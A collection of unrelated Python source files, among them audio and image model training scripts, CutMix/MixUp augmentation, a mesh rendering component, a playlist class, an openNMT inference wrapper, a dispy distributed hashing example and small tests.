        "modelPrependInputRowsToTransformationRows": True,
        "deleteStagingDataAfterTraining": True,
    }
    for attr, expected in expected_defaults.items():
        assert getattr(estimator, attr) == expected
    # Options whose documented default is None.
    for attr in ("trainingProjectedColumns", "trainingContentType",
                 "trainingCompressionCodec", "trainingKmsKeyId"):
        assert getattr(estimator, attr) is None
| StarcoderdataPython |
12122 | import json
import argparse
from argus.callbacks import MonitorCheckpoint, \
EarlyStopping, LoggingToFile, ReduceLROnPlateau
from torch.utils.data import DataLoader
from src.datasets import FreesoundDataset, FreesoundNoisyDataset, RandomDataset
from src.datasets import get_corrected_noisy_data, FreesoundCorrectedNoisyDataset
from src.mixers import RandomMixer, AddMixer, SigmoidConcatMixer, UseMixerWithProb
from src.transforms import get_transforms
from src.argus_models import FreesoundModel
from src.utils import load_noisy_data, load_folds_data
from src import config
parser = argparse.ArgumentParser()
parser.add_argument('--experiment', required=True, type=str)
args = parser.parse_args()
BATCH_SIZE = 128
CROP_SIZE = 256
DATASET_SIZE = 128 * 256
NOISY_PROB = 0.01
CORR_NOISY_PROB = 0.42
MIXER_PROB = 0.8
WRAP_PAD_PROB = 0.5
CORRECTIONS = True
if config.kernel:
NUM_WORKERS = 2
else:
NUM_WORKERS = 8
SAVE_DIR = config.experiments_dir / args.experiment
PARAMS = {
'nn_module': ('AuxSkipAttention', {
'num_classes': len(config.classes),
'base_size': 64,
'dropout': 0.4,
'ratio': 16,
'kernel_size': 7,
'last_filters': 8,
'last_fc': 4
}),
'loss': ('OnlyNoisyLSoftLoss', {
'beta': 0.7,
'noisy_weight': 0.5,
'curated_weight': 0.5
}),
'optimizer': ('Adam', {'lr': 0.0009}),
'device': 'cuda',
'aux': {
'weights': [1.0, 0.4, 0.2, 0.1]
},
'amp': {
'opt_level': 'O2',
'keep_batchnorm_fp32': True,
'loss_scale': "dynamic"
}
}
def train_fold(save_dir, train_folds, val_folds,
               folds_data, noisy_data, corrected_noisy_data):
    """Train one cross-validation fold, validating on `val_folds`.

    Checkpoints and the training log are written to `save_dir`.
    """
    # Augmentation pipeline applied to training crops only.
    train_transform = get_transforms(train=True,
                                     size=CROP_SIZE,
                                     wrap_pad_prob=WRAP_PAD_PROB,
                                     resize_scale=(0.8, 1.0),
                                     resize_ratio=(1.7, 2.3),
                                     resize_prob=0.33,
                                     spec_num_mask=2,
                                     spec_freq_masking=0.15,
                                     spec_time_masking=0.20,
                                     spec_prob=0.5)
    # Randomly alternate between two mixing strategies; the whole mixer is
    # applied with probability MIXER_PROB.
    base_mixer = RandomMixer([
        SigmoidConcatMixer(sigmoid_range=(3, 12)),
        AddMixer(alpha_dist='uniform')
    ], p=[0.6, 0.4])
    mixer = UseMixerWithProb(base_mixer, prob=MIXER_PROB)
    shared_kwargs = dict(transform=train_transform, mixer=mixer)
    curated_dataset = FreesoundDataset(folds_data, train_folds, **shared_kwargs)
    noisy_dataset = FreesoundNoisyDataset(noisy_data, **shared_kwargs)
    corr_noisy_dataset = FreesoundCorrectedNoisyDataset(corrected_noisy_data,
                                                        **shared_kwargs)
    # Sampling mixture over the three training sources.
    dataset_probs = [NOISY_PROB, CORR_NOISY_PROB, 1 - NOISY_PROB - CORR_NOISY_PROB]
    print("Dataset probs", dataset_probs)
    print("Dataset lens", len(noisy_dataset), len(corr_noisy_dataset), len(curated_dataset))
    train_dataset = RandomDataset([noisy_dataset, corr_noisy_dataset, curated_dataset],
                                  p=dataset_probs,
                                  size=DATASET_SIZE)
    # Validation uses deterministic (non-augmenting) transforms.
    val_dataset = FreesoundDataset(folds_data, val_folds,
                                   get_transforms(False, CROP_SIZE))
    train_loader = DataLoader(train_dataset, batch_size=BATCH_SIZE,
                              shuffle=True, drop_last=True,
                              num_workers=NUM_WORKERS)
    val_loader = DataLoader(val_dataset, batch_size=BATCH_SIZE * 2,
                            shuffle=False, num_workers=NUM_WORKERS)
    model = FreesoundModel(PARAMS)
    callbacks = [
        MonitorCheckpoint(save_dir, monitor='val_lwlrap', max_saves=1),
        ReduceLROnPlateau(monitor='val_lwlrap', patience=6, factor=0.6, min_lr=1e-8),
        EarlyStopping(monitor='val_lwlrap', patience=18),
        LoggingToFile(save_dir / 'log.txt'),
    ]
    model.fit(train_loader,
              val_loader=val_loader,
              max_epochs=700,
              callbacks=callbacks,
              metrics=['multi_accuracy', 'lwlrap'])
if __name__ == "__main__":
    if not SAVE_DIR.exists():
        SAVE_DIR.mkdir(parents=True, exist_ok=True)
    else:
        print(f"Folder {SAVE_DIR} already exists.")
    # Snapshot this script and the hyper-parameters into the experiment dir
    # so every run is reproducible.
    with open(SAVE_DIR / 'source.py', 'w') as outfile:
        # Fix: close the source file handle instead of leaking it
        # (was `outfile.write(open(__file__).read())`).
        with open(__file__) as source_file:
            outfile.write(source_file.read())
    print("Model params", PARAMS)
    with open(SAVE_DIR / 'params.json', 'w') as outfile:
        json.dump(PARAMS, outfile)
    folds_data = load_folds_data(use_corrections=CORRECTIONS)
    noisy_data = load_noisy_data()
    corrected_noisy_data = get_corrected_noisy_data()
    # One training run per cross-validation fold.
    for fold in config.folds:
        val_folds = [fold]
        train_folds = list(set(config.folds) - set(val_folds))
        save_fold_dir = SAVE_DIR / f'fold_{fold}'
        print(f"Val folds: {val_folds}, Train folds: {train_folds}")
        print(f"Fold save dir {save_fold_dir}")
        train_fold(save_fold_dir, train_folds, val_folds,
                   folds_data, noisy_data, corrected_noisy_data)
| StarcoderdataPython |
1714361 | import numpy as np
def rand_bbox(height, width, lamda):
    """Sample a random box whose area is roughly (1 - lamda) of the image.

    Returns (width_start, width_end, height_start, height_end), clipped to
    the image bounds, centred at a uniformly random pixel.
    """
    # Side length scales with sqrt(1 - lamda) so the box AREA is ~(1 - lamda).
    cut_ratio = np.sqrt(1 - lamda)
    # Fix: np.int was deprecated in NumPy 1.20 and removed in 1.24; the
    # builtin int() truncates identically for these non-negative values.
    cut_height = int(height * cut_ratio)
    cut_width = int(width * cut_ratio)
    # Coordinates of the center
    center_width = np.random.randint(width)
    center_height = np.random.randint(height)
    # Coordinates of the bounding box, clipped to stay inside the image.
    width_start = np.clip(center_width - cut_width // 2, 0, width)
    width_end = np.clip(center_width + cut_width // 2, 0, width)
    height_start = np.clip(center_height - cut_height // 2, 0, height)
    height_end = np.clip(center_height + cut_height // 2, 0, height)
    return width_start, width_end, height_start, height_end
def perform_cutmix(image_content_alpha,
                   one_hot_encoding_tuple_alpha,
                   image_content_beta,
                   one_hot_encoding_tuple_beta,
                   alpha=0.4):
    """CutMix: paste a random patch of image beta into a copy of image alpha,
    blending the label tuples by the effective patch-area ratio.

    https://github.com/clovaai/CutMix-PyTorch
    https://www.kaggle.com/c/bengaliai-cv19/discussion/126504
    """
    # Mixing coefficient drawn from Beta(alpha, alpha).
    lamda = np.random.beta(alpha, alpha)
    height, width = image_content_alpha.shape[:2]
    width_start, width_end, height_start, height_end = rand_bbox(
        height, width, lamda)
    # Recompute lamda from the ACTUAL (clipped) patch area.
    patch_area = (height_end - height_start) * (width_end - width_start)
    lamda = 1 - patch_area / (height * width)
    # Paste beta's patch onto a copy of alpha.
    image_content = image_content_alpha.copy()
    image_content[height_start:height_end,
                  width_start:width_end] = image_content_beta[
                      height_start:height_end, width_start:width_end]
    # Blend each one-hot vector with the area-corrected coefficient.
    one_hot_encoding_tuple = tuple(
        enc_alpha * lamda + enc_beta * (1 - lamda)
        for enc_alpha, enc_beta in zip(one_hot_encoding_tuple_alpha,
                                       one_hot_encoding_tuple_beta))
    return image_content, one_hot_encoding_tuple
def perform_mixup(image_content_alpha,
                  one_hot_encoding_tuple_alpha,
                  image_content_beta,
                  one_hot_encoding_tuple_beta,
                  alpha=0.4):
    """MixUp: convex-combine two images and their one-hot label tuples with a
    Beta(alpha, alpha)-sampled weight.

    https://github.com/facebookresearch/mixup-cifar10
    https://www.kaggle.com/c/bengaliai-cv19/discussion/126504
    """
    # Mixing coefficient drawn from Beta(alpha, alpha).
    lamda = np.random.beta(alpha, alpha)
    # Convex combination of the two images.
    image_content = lamda * image_content_alpha + (1 - lamda) * image_content_beta
    # Blend each one-hot vector with the same coefficient.
    one_hot_encoding_tuple = tuple(
        enc_alpha * lamda + enc_beta * (1 - lamda)
        for enc_alpha, enc_beta in zip(one_hot_encoding_tuple_alpha,
                                       one_hot_encoding_tuple_beta))
    return image_content, one_hot_encoding_tuple
| StarcoderdataPython |
3312917 | <gh_stars>0
#!/usr/bin/env python3
import notificore_restapi as api
# noinspection PyPackageRequirements
from tests.settings import API_KEY
# Shared API client used by every test in this module (talks to the real service).
requester = api.BalanceAPI(config=dict(api_key=API_KEY))
# Fields the balance endpoint is expected to return.
BALANCE_ATTRIBUTES = ['amount', 'currency', 'limit']
def test_api_balance_balance_api():
    """Smoke-test the balance endpoint: response is a dict with all expected fields."""
    response = requester.get()
    assert isinstance(response, dict)
    for attribute in BALANCE_ATTRIBUTES:
        # NOTE(review): .get() also fails on present-but-falsy values (0, '') —
        # presumably intended as a non-empty check; confirm.
        assert response.get(attribute)
| StarcoderdataPython |
112115 | <gh_stars>1-10
#!/usr/bin/env python
#
# Copyright 2019 DFKI GmbH.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the
# following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
# NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE
# USE OR OTHER DEALINGS IN THE SOFTWARE.
from copy import deepcopy
import numpy as np
from ...graphics.geometry.mesh import Mesh
from .component_base import ComponentBase
from ...graphics import materials
from ...graphics import renderer
from ...graphics.material_manager import MaterialManager
from ...graphics.materials import TextureMaterial
# Node types used when traversing the skeleton hierarchy.
SKELETON_NODE_TYPE_ROOT = 0
SKELETON_NODE_TYPE_JOINT = 1
SKELETON_NODE_TYPE_END_SITE = 2
# Upper bound on the number of bone matrices uploaded for skinning.
MAX_BONES = 150
# Rendering modes for the animated mesh component.
RENDER_MODE_NONE = 0
RENDER_MODE_STANDARD = 1
RENDER_MODE_NORMAL_MAP = 2
RENDER_MODES = [RENDER_MODE_NONE, RENDER_MODE_STANDARD, RENDER_MODE_NORMAL_MAP]
class AnimatedMeshComponent(ComponentBase):
    """Scene-object component that renders skinned meshes driven by an animation controller."""
    def __init__(self, scene_object, mesh_list, skeleton_def, animation_source="animation_controller", scale=1):
        """Build render meshes from `mesh_list` and cache skinning data from `skeleton_def`.

        scene_object: owning object; its `animation_source` component supplies bone matrices.
        mesh_list: list of mesh description dicts (geometry, material, weights).
        skeleton_def: dict with "animated_joints" order and per-node "inv_bind_pose".
        scale: uniform scale applied to geometry and bind-pose translations.
        """
        ComponentBase.__init__(self, scene_object)
        self._scene_object = scene_object
        self.anim_controller = scene_object._components[animation_source]
        self.render_mode = RENDER_MODE_STANDARD
        self.meshes = []
        material_manager = MaterialManager()
        for m_desc in mesh_list:
            geom = None
            if "material" in m_desc:
                material = None
                if "Kd" in m_desc["material"]:
                    texture_name = m_desc["texture"]
                    # NOTE(review): suffix compared as bytes — texture names are
                    # presumably bytes from the importer; confirm against the loader.
                    if texture_name is not None and texture_name.endswith(b'Hair_texture_big.png'):
                        continue
                    # Reuse a cached material for this texture if one exists.
                    material = material_manager.get(m_desc["texture"])
                    if material is None:
                        material = materials.TextureMaterial.from_image(m_desc["material"]["Kd"])
                        material_manager.set(m_desc["texture"], material)
                elif "albedo_texture" in m_desc["material"]:
                    material = TextureMaterial.from_image(m_desc["material"]["albedo_texture"])
                #geom = Mesh.build_legacy_animated_mesh(m_desc, material)
                geom = Mesh.build_from_desc(m_desc, material)
            else:
                # No material description: fall back to a flat red material.
                geom = Mesh.build_from_desc(m_desc, materials.red)
            if geom is not None:
                self.meshes.append(geom)
        # Inverse bind pose per joint, in "animated_joints" order.
        self.inv_bind_poses = []
        for idx, name in enumerate(skeleton_def["animated_joints"]):
            inv_bind_pose = skeleton_def["nodes"][name]["inv_bind_pose"]
            self.inv_bind_poses.append(inv_bind_pose)
        self.vertex_weight_info = [] # store for each vertex a list of tuples with bone id and weights
        for idx, m in enumerate(mesh_list):
            self.vertex_weight_info.append(mesh_list[idx]["weights"])
        self.scale_mesh(scale)
        print("number of matrices", len(self.inv_bind_poses))
    def update(self, dt):
        """Per-frame hook; animation state lives in the controller, so nothing to do."""
        return
    def get_bone_matrices(self):
        """Return skinning matrices: controller pose matrices times inverse bind poses."""
        matrices = np.array(self.anim_controller.get_bone_matrices())
        for idx, inv_m in enumerate(self.inv_bind_poses):
            matrices[idx] = np.dot(matrices[idx],inv_m)
        return matrices
    def scale_mesh(self, scale_factor):
        """Uniformly scale geometry and the translation part of each inverse bind pose."""
        for m in self.meshes:
            m.scale(scale_factor)
        for idx, m in enumerate(self.inv_bind_poses):
            # Only the translation column of the 4x4 matrix needs rescaling.
            self.inv_bind_poses[idx][:3, 3] *= scale_factor
    def prepare_rendering(self, renderer):
        """Upload the current skinning matrices to the renderer before drawing."""
        bone_matrices = self.get_bone_matrices()
        renderer.upload_bone_matrices(bone_matrices)# bone matrices once
    def get_meshes(self):
        """Return the list of render mesh objects owned by this component."""
        return self.meshes
| StarcoderdataPython |
4838789 | <gh_stars>0
#/usr/bin/python
from __future__ import print_function
import random
import copy
'''
playlist.py
Python class that represents a playlist
@author: <NAME> <<EMAIL>>
'''
__author__ = "<NAME>"
class Playlist:
    """A playlist to be played by the Pi.

    Keeps an ordered copy and a shuffleable copy of its tracks so shuffle
    mode can be toggled without losing the original order.
    """
    def __init__(self, id, name, tracks):
        """
        :param id: Playlist unique id (unique to streaming service)
        :param name: Name of the playlist
        :param tracks: List of track objects
        """
        self.id = id
        self.name = name
        # Two independent deep copies: one preserves order, one gets shuffled.
        self.tracks_original = copy.deepcopy(tracks)
        self.tracks_shuffle = copy.deepcopy(tracks)
        self.isShuffle = False
        # Active view; starts out pointing at the ordered copy.
        self.tracks = self.tracks_original
        # Index of the current track.
        self.cur = 0
        # Text-to-speech read-out file, set later by the playback service.
        self.ttsFile = None
    def __str__(self):
        """Human-readable summary: '<id>: <name> -> [ t1, t2, ... ]'."""
        listing = "".join(str(track) + ", " for track in self.tracks)
        return str(self.id) + ": " + self.name + " -> [ " + listing + " ]"
    def current(self):
        """Return the unique id of the current track."""
        return self.tracks[self.cur].id
    def prev(self):
        """Step to the previous track (wrapping around) and return its id."""
        self.cur = (self.cur - 1) % len(self.tracks)
        return self.current()
    def next(self):
        """Step to the next track (wrapping around) and return its id."""
        self.cur = (self.cur + 1) % len(self.tracks)
        return self.current()
    def shuffle(self):
        """Toggle shuffle mode, re-shuffling the shuffle copy on activation."""
        self.isShuffle = not self.isShuffle
        if self.isShuffle:
            random.shuffle(self.tracks_shuffle)
            self.tracks = self.tracks_shuffle
        else:
            self.tracks = self.tracks_original
def main():
    """Entry point for manual testing; intentionally does nothing yet."""
    return None


if __name__ == '__main__':
    main()
| StarcoderdataPython |
4829562 | # pylint: skip-file
# Import smoke test: verifies the compiled CAN packer extension builds and loads.
from opendbc.can.packer_pyx import CANPacker
assert CANPacker
| StarcoderdataPython |
113852 | from collections import deque
from constants import section_break_token,line_start_token
import os
import pickle
from pymongo import MongoClient
def add_to_trie(trie, tokens, depth):
    """Fold *tokens* into *trie*, counting every n-gram suffix up to *depth*.

    The trie is a nested [count, children] structure: trie[0] is the total
    number of tokens seen, and children map token -> [count, children].
    """
    recent = deque(maxlen=depth)
    for token in tokens:
        trie[0] += 1
        recent.append(token)
        # Register the current token under every suffix of the recent history.
        for start in range(len(recent)):
            node = trie
            for step in range(start, len(recent) - 1):
                node = node[1][recent[step]]
            entry = node[1].setdefault(token, [0, {}])
            entry[0] += 1
def tokenize_line(line):
    """Split *line* on whitespace, detaching trailing punctuation into its own token."""
    trailing_punct = (',', '.', '?', '!', ';', ':', '…')
    tokens = []
    for word in line.split():
        if not word:
            continue
        # Multi-character words ending in punctuation are split in two;
        # everything else (including single characters) passes through.
        if len(word) > 1 and word[-1] in trailing_punct:
            tokens.append(word[:-1])
            tokens.append(word[-1])
        else:
            tokens.append(word)
    return tokens
def tokenize_text(text):
    """Tokenize *text* into a flat stream with a line-start marker before each
    non-empty line, terminated by a section-break token."""
    # Lowercase and strip curly quotes before tokenizing.
    cleaned = text.lower()
    for quote_char in ('”', '“', '‘', '’'):
        cleaned = cleaned.replace(quote_char, '')
    tokens = [line_start_token]
    for line in cleaned.split("\n"):
        line_tokens = tokenize_line(line)
        if line_tokens:
            tokens.extend(line_tokens)
            tokens.append(line_start_token)
    # Terminate the snippet with a section break instead of a dangling line start.
    if tokens:
        tokens[-1] = section_break_token
    return tokens
# --- Script: compile chapter quotes/attributions into n-gram tries ---------
bin_path = os.environ['BIN_PATH']
client = MongoClient(os.environ['MONGO_CONNECTION_URI'])
db = client.pgte
print("Compiling")
# Maximum n-gram history tracked per token.
trie_depth = 5
# Tries are nested [count, children] lists (see add_to_trie).
trie_quotes = [0, {}]
trie_attributions = [0, {}]
for chapter in db.chapters.find():
    print("Adding quote from {0}: {1}".format(chapter['book'], chapter['title']))
    quote_tokens = tokenize_text(chapter['quote'])
    add_to_trie(trie_quotes, quote_tokens, trie_depth)
    attribution_tokens = tokenize_text(chapter['attribution'][1:]) # prune initial '-'
    add_to_trie(trie_attributions, attribution_tokens, trie_depth)
print("Saving compiled quotes")
with open("{0}/quotes.dat".format(bin_path), "wb") as f:
    pickle.dump(trie_quotes, f)
print("Saving compiled attributions")
with open("{0}/attributions.dat".format(bin_path), "wb") as f:
pickle.dump(trie_attributions, f) | StarcoderdataPython |
135793 | raio = int(input())
pi = 3.14159  # fixed approximation expected by the judge (not math.pi)
# Sphere volume: V = 4/3 * pi * r^3 (radius read from stdin on the line above).
volume = float(4.0 * pi * (raio* raio * raio) / 3)
print("VOLUME = %0.3f" %volume)
| StarcoderdataPython |
3303364 | <reponame>joni115/neuralFrame
import yaml
import tempfile
from opennmt.runner import Runner
from opennmt.models.model import Model
from opennmt.config import load_config, load_model
class Neural:
    """
    Wrapper around an openNMT-tf Runner for translation inference.
    https://arxiv.org/abs/1701.02810
    """
    def __init__(self, config):
        """
        Configuration for the model.
        :config: the configuration for the model.
            -- :config_path: a list of YAML paths merged (in order) into the model config
            -- :model_type: an openNMT model type name
            -- :checkpoint_path: checkpoint used at inference time
            -- :auto_config: passed through to the Runner
        """
        self.__config = {}
        for config_path in config['config_path']:
            with open(config_path, 'r') as f:
                # NOTE(review): yaml.load without an explicit Loader is unsafe on
                # untrusted files (and warns on PyYAML >= 5.1) — confirm configs
                # are trusted or switch to yaml.safe_load.
                self.__config.update(yaml.load(f.read()))
        self.__config['model_type'] = config['model_type']
        self.__config['checkpoint_path'] = config['checkpoint_path']
        model = load_model(self.__config['model_dir'],
                           model_name=self.__config['model_type'])
        self.model = Runner(model, self.__config, auto_config=config['auto_config'])
    def infer(self, sentences):
        """
        Translate a batch of sentences.
        :sentences: a list of preprocessed sentences (newline-terminated lines).
        return the list of translated sentences.
        """
        # we are using opennmt-tf so we should open a file to write sentences to translated.
        file_to_translate = tempfile.NamedTemporaryFile('w', delete=False)
        file_to_translate.writelines(sentences)
        file_to_translate.close()
        # NOTE(review): delete=False temp files are never removed here —
        # presumably intentional (debugging?); confirm or clean up after reading.
        file_translated = tempfile.NamedTemporaryFile('w', delete=False)
        file_translated.close()
        self.model.infer(features_file=file_to_translate.name,
                         predictions_file=file_translated.name,
                         checkpoint_path=self.__config['checkpoint_path'])
        with open(file_translated.name, 'r') as f:
            sentences_translated = f.readlines()
        return sentences_translated
| StarcoderdataPython |
3344310 | # Example program that uses 'setup' and 'cleanup' functions to
# initialize/de-initialize global variables on each node before
# computations are executed. Computations use data in global variables
# instead of reading input for each job.
# Under Windows global variables must be serializable, so modules
# can't be global variables: See
# https://docs.python.org/2/library/multiprocessing.html#windows for
# details.
def setup(data_file):
# read data in file to global variable
global data, algorithms, hashlib, time, file_name
import hashlib, time
data = open(data_file).read() # read file in to memory; data_file can now be deleted
file_name = data_file
if sys.version_info.major > 2:
data = data.encode() # convert to bytes
algorithms = list(hashlib.algorithms_guaranteed)
else:
algorithms = hashlib.algorithms
# if running under Windows, modules can't be global, as they are not
# serializable; instead, they must be loaded in 'compute' (jobs); under
# Posix (Linux, OS X and other Unix variants), modules declared global in
# 'setup' will be available in 'compute'
# 'os' module is already available (loaded by dispynode)
if os.name == 'nt': # remove modules under Windows
del hashlib, time
return 0
# 'cleanup' should have same argument as 'setup'
def cleanup(data_file):
    """Per-node teardown: drop the globals created by 'setup' (argument unused)."""
    global data, algorithms, hashlib, time, file_name
    del data, algorithms, file_name
    # Under Windows 'hashlib'/'time' were already removed at the end of 'setup'.
    if os.name != 'nt':
        del hashlib, time
def compute(n):
    """Dispy job: hash the node-global 'data' with the n-th available algorithm.

    Runs on a dispynode: 'data'/'algorithms'/'file_name' come from 'setup',
    and 'dispy_node_ip_addr' is injected by dispy into the job's globals.
    """
    global hashlib, time
    if os.name == 'nt': # Under Windows modules must be loaded in jobs
        import hashlib, time
    # 'data' and 'algorithms' global variables are initialized in 'setup'
    alg = algorithms[n % len(algorithms)]
    csum = getattr(hashlib, alg)()
    csum.update(data)
    time.sleep(2)  # simulate longer-running work
    return (dispy_node_ip_addr, file_name, alg, csum.hexdigest())
if __name__ == '__main__':
    import dispy, sys, os, glob
    # each node processes a file in 'data_files' with 'NodeAllocate.allocate'
    data_files = glob.glob(os.path.join(os.path.dirname(sys.argv[0]), '*.py'))
    node_id = 0
    # sub-class NodeAllocate to use node (and computation) specific 'depends'
    # and 'setup_args'
    class NodeAllocate(dispy.NodeAllocate):
        def allocate(self, cluster, ip_addr, name, cpus, avail_info=None, platform='*'):
            """Assign the next data file to this node; return the CPUs to use."""
            global node_id
            # Round-robin over the discovered data files.
            data_file = data_files[node_id % len(data_files)]
            node_id += 1
            print('Node %s (%s) processes "%s"' % (ip_addr, name, data_file))
            self.depends = [data_file] # 'depends' must be a list
            self.setup_args = (data_file,) # 'setup_args' must be a tuple
            return cpus
    cluster = dispy.JobCluster(compute, nodes=[NodeAllocate('*')], setup=setup, cleanup=cleanup)
    jobs = []
    for n in range(10):
        job = cluster.submit(n)
        jobs.append(job)
    for job in jobs:
        job()  # wait for this job to finish
        if job.status == dispy.DispyJob.Finished:
            print('%s: "%s" %s: %s' % job.result)
        else:
            print(job.exception)
    cluster.print_status()
    cluster.close()
| StarcoderdataPython |
174042 | import os
import torch
import segmentation_models_pytorch as smp
import pandas as pd
from abc import abstractmethod
from pathlib import Path
from catalyst.dl.callbacks import AccuracyCallback, EarlyStoppingCallback, \
CheckpointCallback, PrecisionRecallF1ScoreCallback
from catalyst.dl.runner import SupervisedRunner
from sklearn.model_selection import train_test_split
from torch.utils.data import DataLoader
from torch.optim.lr_scheduler import ReduceLROnPlateau, CosineAnnealingLR, \
CosineAnnealingWarmRestarts, CyclicLR
from clouds.models import Pretrained, ResNet34FPN
from clouds.metrics import BCEDiceLoss, FocalLoss, HengFocalLoss
from clouds.io import ClassificationCloudDataset, CloudDataset, \
ClfSegCloudDataset
from .utils import get_preprocessing, get_training_augmentation, \
get_validation_augmentation, setup_train_and_sub_df, \
seed_everything
class TrainExperiment(object):
    """Template for a training experiment: builds the df split, datasets,
    loaders, model, optimizer, scheduler, criterion and callbacks from a
    single config dict. Subclasses supply `get_datasets` and `get_model`."""
    def __init__(self, config: dict):
        """
        Args:
            config (dict): from `train_classification_yaml.py`
        Attributes:
            config-related:
                config (dict): from `train_classification_yaml.py`
                io_params (dict): contains io-related parameters
                    image_folder (key: str): path to the image folder
                    df_setup_type (key: str): regular or pos_only
                    test_size (key: float): split size for test
                    split_seed (key: int): seed
                    batch_size (key: int): <-
                    num_workers (key: int): # of workers for data loaders
                    aug_key (key: str): One of the augmentation keys for
                        `get_training_augmentation` and `get_validation_augmentation`
                        in `scripts/utils.py`
                opt_params (dict): optimizer related parameters
                    lr (key: str): learning rate
                    opt (key: str): optimizer name
                        Currently, only supports sgd and adam.
                    scheduler_params (key: str): dict of:
                        scheduler (key: str): scheduler name
                        {scheduler} (key: dict): args for the above scheduler
                cb_params (dict):
                    earlystop (key: str):
                        dict -> kwargs for EarlyStoppingCallback
                    accuracy (key: str):
                        dict -> kwargs for AccuracyCallback
                    checkpoint_params (key: dict):
                        checkpoint_path (key: str): path to the checkpoint
                        checkpoint_mode (key: str): model_only or
                            full (for stateful loading)
            split_dict (dict): train_ids and valid_ids
            train_dset, val_dset: <-
            loaders (dict): train/validation loaders
            model (torch.nn.Module): <-
            opt (torch.optim.Optimizer): <-
            lr_scheduler (torch.optim.lr_scheduler): <-
            criterion (torch.nn.Module): <-
            cb_list (list): list of catalyst callbacks
        """
        # for reuse
        self.config = config
        self.io_params = config["io_params"]
        self.opt_params = config["opt_params"]
        self.cb_params = config["callback_params"]
        self.model_params = config["model_params"]
        self.criterion_params = config["criterion_params"]
        # initializing the experiment components
        self.df, _, self.id_mask_count = self.setup_df()
        train_ids, val_ids = self.get_split()
        self.train_dset, self.val_dset = self.get_datasets(train_ids, val_ids)
        self.loaders = self.get_loaders()
        self.model = self.get_model()
        self.opt = self.get_opt()
        self.lr_scheduler = self.get_lr_scheduler()
        self.criterion = self.get_criterion()
        self.cb_list = self.get_callbacks()
    @abstractmethod
    def get_datasets(self, train_ids, valid_ids):
        """
        Initializes the data augmentation and preprocessing transforms. Creates
        and returns the train and validation datasets.
        """
        return
    @abstractmethod
    def get_model(self):
        """
        Creates and returns the model.
        """
        return
    def setup_df(self):
        """
        Setting up the dataframe to have the `im_id` & `label` columns;
            im_id: the base img name
            label: the label name
        """
        train_csv_path = self.config["train_csv_path"]
        sample_sub_csv_path = self.config["sample_sub_csv_path"]
        return setup_train_and_sub_df(train_csv_path, sample_sub_csv_path)
    def get_split(self):
        """
        Creates train/valid filename splits
        """
        # setting up the train/val split with filenames
        df_setup_type = self.io_params["df_setup_type"].lower()
        split_seed: int = self.io_params["split_seed"]
        test_size: float = self.io_params["test_size"]
        # doing the splits
        # NOTE(review): an unrecognized df_setup_type leaves train_ids/valid_ids
        # unbound and raises UnboundLocalError at the return below.
        if df_setup_type == "pos_only":
            print("Splitting the df with pos only ids...")
            assert self.id_mask_count is not None
            train_ids, valid_ids = train_test_split(self.id_mask_count["im_id"].values,
                                                    random_state=split_seed,
                                                    stratify=self.id_mask_count["count"],
                                                    test_size=test_size)
        elif df_setup_type == "regular":
            print("Splitting the df normally...")
            train_ids, valid_ids = train_test_split(self.df["im_id"].drop_duplicates().values,
                                                    random_state=split_seed,
                                                    test_size=test_size)
        return (train_ids, valid_ids)
    def get_loaders(self):
        """
        Creates train/val loaders from datasets created in self.get_datasets.
        Returns the loaders.
        """
        # setting up the loaders
        b_size, num_workers = self.io_params["batch_size"], self.io_params["num_workers"]
        train_loader = DataLoader(self.train_dset, batch_size=b_size,
                                  shuffle=True, num_workers=num_workers)
        valid_loader = DataLoader(self.val_dset, batch_size=b_size,
                                  shuffle=False, num_workers=num_workers)
        self.train_steps = len(self.train_dset) # for schedulers
        return {"train": train_loader, "valid": valid_loader}
    def get_opt(self):
        """Builds the optimizer named in opt_params ('adam' or 'sgd')."""
        assert isinstance(self.model, torch.nn.Module), \
            "`model` must be an instance of torch.nn.Module`"
        # fetching optimizers
        # NOTE(review): an unrecognized opt name leaves `opt` unbound (NameError).
        lr = self.opt_params["lr"]
        opt_name = self.opt_params["opt"].lower()
        if opt_name == "adam":
            opt = torch.optim.Adam(self.model.parameters(), lr=lr)
        elif opt_name == "sgd":
            opt = torch.optim.SGD(filter(lambda p: p.requires_grad,
                                         self.model.parameters()),
                                  lr=lr, momentum=0.9, weight_decay=0.0001)
        return opt
    def get_lr_scheduler(self):
        """Builds the LR scheduler named in opt_params["scheduler_params"]."""
        assert isinstance(self.opt, torch.optim.Optimizer), \
            "`optimizer` must be an instance of torch.optim.Optimizer"
        sched_params = self.opt_params["scheduler_params"]
        scheduler_name = sched_params["scheduler"].lower()
        scheduler_args = sched_params[scheduler_name]
        # fetching lr schedulers
        # NOTE(review): an unrecognized scheduler name leaves `scheduler` unbound.
        if scheduler_name == "plateau":
            scheduler = ReduceLROnPlateau(self.opt, **scheduler_args)
        elif scheduler_name == "cosineannealing":
            scheduler = CosineAnnealingLR(self.opt, **scheduler_args)
        elif scheduler_name == "cosineannealingwr":
            scheduler = CosineAnnealingWarmRestarts(self.opt,
                                                    **scheduler_args)
        elif scheduler_name == "clr":
            scheduler = CyclicLR(self.opt, **scheduler_args)
        print(f"LR Scheduler: {scheduler}")
        return scheduler
    def get_criterion(self):
        """Builds the loss function named in criterion_params ('bce_dice_loss' or 'bce')."""
        loss_name = self.criterion_params["loss"].lower()
        if loss_name == "bce_dice_loss":
            criterion = smp.utils.losses.BCEDiceLoss(eps=1.)
        elif loss_name == "bce":
            criterion = torch.nn.BCEWithLogitsLoss()
        print(f"Criterion: {criterion}")
        return criterion
    def get_callbacks(self):
        """Assembles catalyst callbacks; optionally resumes from a checkpoint."""
        callbacks_list = [PrecisionRecallF1ScoreCallback(num_classes=4),#DiceCallback(),
